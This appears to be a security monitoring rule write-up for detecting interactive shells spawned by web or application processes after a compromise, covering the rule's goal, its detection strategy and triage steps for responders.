What happened

The process {{ @process.comm }} was executed with arguments indicating a post compromise shell being created for remote access.

Goal

Detect attempts to create an interactive shell from common web or application processes.

Strategy

Many applications (for example, certain databases, web servers, and search engines) are hosted by binaries that run on the host. Attackers may take advantage of flaws in programs built with these applications (for example, SQL injection on a database running as a Java process).

This detection triggers when a process spawns common shell utilities, HTTP utilities, or shells with arguments that are known to be used to establish shells on the targeted asset. If this is unexpected behavior, it could indicate an attacker is attempting to compromise your host.

Triage and response

1. Determine the nature and purpose of the process.
2. Determine whether there is an approved purpose for the process to execute shells and utilities.
3. If this behavior is unexpected, attempt to contain the compromise (this may be achieved by terminating the workload, depending on the stage of attack). Investigate application logs or APM data to look for indications of the initial compromise. Follow your organization’s internal processes for investigating and remediating compromised systems.
4. Find and repair the root cause of the exploit.